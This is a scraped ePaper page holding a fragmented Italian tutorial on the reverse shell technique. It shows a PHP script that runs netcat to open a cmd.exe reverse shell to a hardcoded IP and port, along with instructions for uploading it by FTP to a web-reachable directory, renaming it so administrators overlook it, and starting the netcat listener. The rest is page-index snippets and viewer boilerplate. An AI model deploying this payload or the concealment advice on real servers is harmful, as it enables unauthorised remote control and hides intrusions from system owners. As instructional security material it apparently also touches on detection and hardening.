Tecnica della Reverse Shell

More documents

Recommendations

Info

Bugs: //The "manual" is way longer than the code itself // //Author: //RVV - r.vincelli@campus.unimib.it $shell = 'nc.exe -v -n 192.168.1.4 12345 -e cmd.exe'; exec($shell); ?> Vedi "Esempio" per una dimostrazione dell' attacco. 4.2. Caricamento L' assunzione piu' comoda e' avere un account ftp o similia per uppare lo script in una directory raggiungibile dal webserver; ovviamente in generale e' quest' ultimo punto che ci interessa, non tanto come ci arriviamo (ftp o altro). Lo script e' un file php, testo quindi, e va inviato in modalita' ascii pertanto. Non e' generalmente necessario modificarne i permessi, ma e' auspicabile modificarne il nome in qualcosa che, se proprio non
inganni, quando lo legga, l' amministratore, almeno non gli sia lampante quando ci mette sopra gli occhi. Torneremo sotto sui "tempi di sopravvivenza" stimati di questo tipo di attacco. 4.3-4.4. Netcat Netcat (nc) e' un' utility unix portata anche a Windows soprannominata "coltellino svizzero di Internet", ed a buon diritto: puo' essere utilizzato in modo arbitrario come peer di una connessione tcp o udp, permettendo cose come modello client/server, trasferimento di dati, client raw e molte altre. Nel nostro caso ci limitiamo al comando per metterlo in ascolto: nc -l -p PORTA dove PORTA dev' essere ovviamente quella messa nello script. In un sistema Windows la porta in uso non dev' essere bloccata da firewall, in unix oltre a questo dobbiamo utilizzare, se non root (e veramente non ha senso che si sia loggati root in una situazione del genere, e piu' in generale ora non ha piu' senso essere loggati come root, esistendo utility come
Page 1 and 2: Tecnica della Reverse Shell Riccard
Page 3 and 4: piu' avanti. Una shell si puo' otte
Page 5 and 6: programmi del tipo. Cio' si lega pr
Page 7 and 8: Inutile dire che la possibilita' di
Page 9 and 10: emoto) 4.Mettere in ascolto il netc
Page 11: http://joncraton.org/media/files/nc
Page 15 and 16: client che servono) -di default, la
Page 17 and 18: anonima o connettercisi ad IRC. 5.
Page 19 and 20: capire come l' attaccante e' entrat
Page 21 and 22: sistema come kernel, librerie famos
Page 23 and 24: essere... 6.2....configurare opport
Page 25 and 26: hardening ma non si abbia accesso a
Page 27 and 28: Non dimentichiamo che uno script de
Page 29 and 30: se il dbms espone comandi opportuni
Page 31 and 32: In ascolto sulla macchina attaccant
Page 33 and 34: La shell e' arrivata! Notiamo che l

Tecnica della Reverse Shell

Create successful ePaper yourself

Delete template?

Save as template?